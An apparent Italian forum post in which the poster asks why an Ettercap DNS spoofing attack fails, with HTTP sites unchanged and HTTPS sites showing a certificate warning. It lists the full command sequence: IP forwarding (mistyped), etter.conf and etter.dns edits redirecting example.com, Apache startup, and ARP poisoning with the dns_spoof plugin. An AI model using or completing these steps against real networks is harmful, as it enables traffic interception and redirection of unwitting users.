Sto tentando di eseguire un attacco di spoofing DNS, ma la cosa confusa è che quando eseguo l'attacco sui siti HTTP , non succede niente.
Ma quando lo eseguo sui siti HTTPS , quando raggiungo il sito di destinazione, viene visualizzato il messaggio: "La tua connessione non è privata"!
I miei comandi su Kali Linux usando Ettercap erano
echo > 1 /proc/sys/net/ipv4/ip_forward
e poi ho modificato etter.conf e cancellato entrambi # nella sezione iptables e ho messo il mio sito web target in etter.dns sotto microsoft sucks come questo:
*.example.com A my ip
e lo stesso ultimo ma inizia con
www.example.com A my ip
il comando successivo era service apache2 start
e infine ettercap -T -q -i wlan0 -M arp:remote -P dns_spoof /ROUTER IP/ /TARGET IP/
Quindi dopo questi comandi mi aspetto sicuramente di visualizzare il mio Apache invece di "esempio.com", ma come ho detto il risultato non ha avuto alcun effetto sui siti http e il messaggio "La tua connessione non è privata" su https.
La mia domanda principale è perché questo attacco non funziona per entrambi i http, https, Pensi che sia dovuto alle impostazioni del router o manca qualcosa?